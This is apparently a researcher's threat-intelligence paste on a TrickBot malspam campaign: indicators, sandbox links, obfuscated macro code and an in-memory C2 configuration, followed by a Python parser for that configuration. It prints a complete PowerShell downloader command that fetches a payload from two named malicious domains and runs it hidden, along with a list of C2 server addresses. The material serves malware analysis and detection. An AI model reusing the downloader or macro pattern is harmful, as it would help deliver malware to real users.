- found by @neonprimetime security
- #trickbot
- same as this article https://myonlinesecurity.co.uk/yet-another-fake-companies-house-fw-company-complaint-3290749822-delivers-trickbot/
- https://www.joesandbox.com/analysis/61724/0/html
- Subject: FW: Company Complaint #xxxxxx
- Attachment: xxxxxx.doc
- 507542d2ebb235941b3fbbb72f11950f
- https://www.hybrid-analysis.com/sample/1fe32e3850e1ddd03e0415b2989d6f2751e276231d4bcded2c2d43f88057416c?environmentId=120
- dropped
- logo.exe
- 8CD3BA008C93327369B3D50341DB8F74
- https://www.hybrid-analysis.com/sample/9d98f1ce5d7abb69a84d7224f44837f090f95d811c12d45173b529bf77bb3d9c?environmentId=100
- ------------
- downloader commands run
- ------------
- cmd.exe /c PowerShell "'PowerShell ""function Zupwjwbz1([String] $jdknrwstldt){(New-Object System.Net.WebClient).DownloadFile($jdknrwstldt,''%TEMP%\mlodfhqs_w.exe'');Start-Process ''%TEMP%\mlodfhqs_w.exe'';}try{Zupwjwbz1(''http://carasaan.com/logo.bin'')}catch{Zupwjwbz1(''http://tvboxaddons.com/logo.bin'')}'"" | Out-File -encoding ASCII -FilePath %TEMP%\Sg_ho1.bat;Start-Process '%TEMP%\Sg_ho1.bat' -WindowStyle Hidden"
- ------------
- interesting macro code
- ------------
- Function henderss()
- henderss = wwwpasswd.yb121212
- End Function
- Function tester198()
- tester198 = wwwpasswd.chewlang
- End Function
- Sub oodwin1234(kimpickle)
- tataskelt = "Run"
- embrocate = 0
- azinepli = True
- diecasts = 52 - 72
- CallByName kimpickle, tataskelt, VbMethod, vogotave.ympmeoha, embrocate, azinepli
- diecasts = 91 - 60 * diecast
- diecasts = 70 + 6
- diecasts = 3 + 72 - diecasts - 73 - diecast
- End Sub
- --------------------
- interesting in memory strings
- --------------------
- 0x2e208c (1736): <mcconf><ver>1000200</ver><gtag>ser0530</gtag><servs><srv>109.86.227.152:443</srv><srv>185.129.78.167:443</srv><srv>190.4.189.129:443</srv><srv>103.228.142.14:443</srv><srv>65.30.201.40:443</srv><srv>66.232.212.59:443</srv><srv>80.53.57.146:443</srv><srv>208.75.117.70:449</srv><srv>92.55.251.211:449</srv><srv>94.112.52.197:449</srv><srv>209.121.142.202:449</srv><srv>5.102.177.205:449</srv><srv>209.121.142.214:449</srv><srv>95.161.180.42:449</srv><srv>185.42.192.194:449</srv><srv>107.144.49.162:443</srv><srv>46.72.175.17:449</srv><srv>144.48.51.8:443</srv><srv>46.243.179.212:449</srv><srv>82.146.59.174:443</srv><srv>82.146.58.44:443</srv><srv>82.146.42.89:443</srv><srv>82.202.221.207:443</srv><srv>185.146.156.38:443</srv><srv>195.161.114.57:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun></mcconf>
- 0x2f3ba0 (26): 208.75.117.70
- 0x2f4bb0 (91): https://208.75.117.70:449/ser0530/[REDACTED INFO]/5/spk/
- 0x40004d (29): !This is a PE executable
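A small parser for the in-memory <mcconf> block listed above, added here as an example (it is not part of the paste): it carves mcconf blobs out of a raw memory buffer and pulls out the version, group tag, C2 server list and autorun modules so they can be fed to blocklists or detection rules. The memory buffer below is constructed; it reuses the page's ver/gtag values but TEST-NET addresses instead of the sample's real servers.

```python
import re
import xml.etree.ElementTree as ET

# Carve a TrickBot <mcconf> blob out of raw process memory (non-greedy, spans NULs).
MCCONF_RE = re.compile(rb"<mcconf>.*?</mcconf>", re.DOTALL)

# Constructed memory sample in the same <mcconf> layout seen on this page.
# Addresses are TEST-NET placeholders, not the servers from the real sample.
SAMPLE_MEMORY = (
    b"\x00\x00junk\x00"
    b"<mcconf><ver>1000200</ver><gtag>ser0530</gtag><servs>"
    b"<srv>192.0.2.10:443</srv><srv>198.51.100.7:449</srv><srv>203.0.113.5:443</srv>"
    b"</servs><autorun><module name=\"systeminfo\" ctl=\"GetSystemInfo\"/>"
    b"<module name=\"injectDll\"/></autorun></mcconf>"
    b"\x00!This is a PE executable\x00"
)

def carve_mcconf(memory: bytes) -> list:
    """Return every <mcconf>...</mcconf> blob found in a memory buffer."""
    return MCCONF_RE.findall(memory)

def parse_mcconf(blob: bytes) -> dict:
    """Parse one mcconf blob into version, group tag, C2 servers and autorun modules."""
    root = ET.fromstring(blob)
    if root.tag != "mcconf":
        raise ValueError("not an mcconf document")
    servers = []
    for srv in root.iterfind("./servs/srv"):
        host, _, port = (srv.text or "").rpartition(":")
        if not host or not port.isdigit():
            continue  # skip a malformed entry instead of failing the whole config
        servers.append((host, int(port)))
    modules = [{"name": m.get("name"), "ctl": m.get("ctl")}
               for m in root.iterfind("./autorun/module")]
    return {"ver": root.findtext("ver"), "gtag": root.findtext("gtag"),
            "servers": servers, "modules": modules}

def extract_configs(memory: bytes) -> list:
    """Carve and parse all configs in a buffer; blobs that are not valid XML are skipped."""
    configs = []
    for blob in carve_mcconf(memory):
        try:
            configs.append(parse_mcconf(blob))
        except ET.ParseError:
            continue
    return configs

if __name__ == "__main__":
    for cfg in extract_configs(SAMPLE_MEMORY):
        print(cfg["gtag"], cfg["ver"], [f"{h}:{p}" for h, p in cfg["servers"]])
```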